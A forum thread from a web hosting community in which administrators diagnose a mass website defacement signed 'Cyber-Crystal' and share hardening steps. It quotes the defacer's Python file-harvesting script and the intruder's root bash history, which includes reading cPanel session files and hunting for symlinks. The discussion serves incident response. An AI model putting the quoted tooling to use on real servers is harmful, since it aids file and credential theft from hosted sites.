Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Hacked by Cyber-Crystal

[Dig1]

A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks

[mike86]

Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

[PlotHost-Max]

Indeed, you should check the server logs. Also update the script you are using (wordpress etc) to the latest version.

[Lee-RackSRV]

Check server access logs for successful logins:

last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp

Once done check for hidden dirs:

updatedb
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."

Assuming you find nothing suspicious here, start checking access logs and such for suspicious items, ensure you check for rootkits also.

I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.

Failing this check the server for possible exploits / out of date software.

Good luck with your search I hope you keep us up to date.

[amigoserv]

Check scripts on your sites that allow uploading maliciuos files

I think this hacker can't do anything except adding his index files only not sql injection or others

so I recommended to secure your server with firewall CSF and modsecurity

[lynxus]

My first port of call would be to look at the FTP logs if a lot of people have been done the same way.

My second look would be at any kind of 3rd party scripts that a lot of other people may use ( Wordpress, Mailer scripts, Monitoring scripts , etc etc.. )

Its evidently a generic hack that a lot of people are vuln for.

[ioTerrence]

A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!

[Dawg]

Quote:

Originally Posted by Dig1

A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks

Holy cow. A google search renders hundreds of hacked sites. Looks like someone needs to get a life.

[ioTerrence]

Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?

#!/usr/bin/python
# mekad By Cyber-Crystal
#
# Cyb3r.Crystal@Gmail.com

# tryag.cc

import urllib2,re
raw = raw_input('URL CONF : ')
url = urllib2.urlopen(raw)
data = url.read()
finddata = re.findall('href="(.*?)">',data)
for cyb3r in range(len(finddata)):
try:
filecon = open(finddata[cyb3r],'a')
done = urllib2.urlopen(raw+finddata[cyb3r])
wewe = done.read()
print "Witteng ....\n"
filecon.write(wewe)
print "Done "
except IOError:
print "error"

[Dig1]

Yes and in the /etc/httpd/conf they also added 5 files named 1.pl 2.pl 3.pl etc
So i figured they had to have accessed root someway and did this and added the files
in roots bash history >
ls -l /etc/valiases
cd /etc/valiases
ls -la /etc/valiases
ls -la /etc/valiases/
cd /usr/loca/apache
cd /etc/httpd/conf
cat httpd.conf | grep DocumentRoot
nano 1.pl
pico 1.pl
nano 1.pl
yum install nano
nano 1.pl
perl 1.pl
nano 2.pl
perl 2.pl
nano 3.pl
perl 3.pl
ifconfig
nano 4.pl
perl 4.pl
exit
pdw
pwd
ls
locate index.html
cd /var/www
ls
cd html
ls
cd ..
cd /usr/local/apache
cd /usr/local
ls
cd /etc/httpds
cd /etc/httpd
ls
cd conf
cat httpd.conf | grep DocumentRoot
cat /var/cpanel
cat * /var/cpanel/sessions
dec6find /home*/*/public_html -type l
........
So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding like >
rkhunter,denyhost,fail2ban,Mod_security,AIDE (Advanced Intrusion Detection Environment),and locked down httpd config (file indexing ) an / access also Made Root nologin except by SU thru a special user with a passwd of 16 char , numbers and punctuation also tightened PHP and MYSQL security
I reloaded from backup all customers websites and all is well for now
my iptables have grown quite a bit
a few country bans were atoadded and denyhost has added to deny host file also
I am a little more confident now!

[lynxus]

Quote:

Originally Posted by Dig1

So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding

Probably the best thing.

- You have identified whats going on and what level of compromise you have had.
- You have taken the best action possible and re-installed now knowing what to look out for.

Only if everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running..

[Dig1]

ty yup yup

[iLoveHosting-UK]

Quote:

Originally Posted by Dig1

A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks

If it only a number of sites been hacked it could be due to unsecure versions of software. If it was all of the sites im sorry to say but you have been rooted.

- Ashton

[SafeSrv]

If he can switch directories and read files your server is not setup properly - and just installing the server software you mentioned may not even be enough, it all has to be configured correctly to be effective.

And btw - this certainly looks like a real SKID

[Exerox]

Quote:

Originally Posted by ioTerrence

A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!

I liked that song.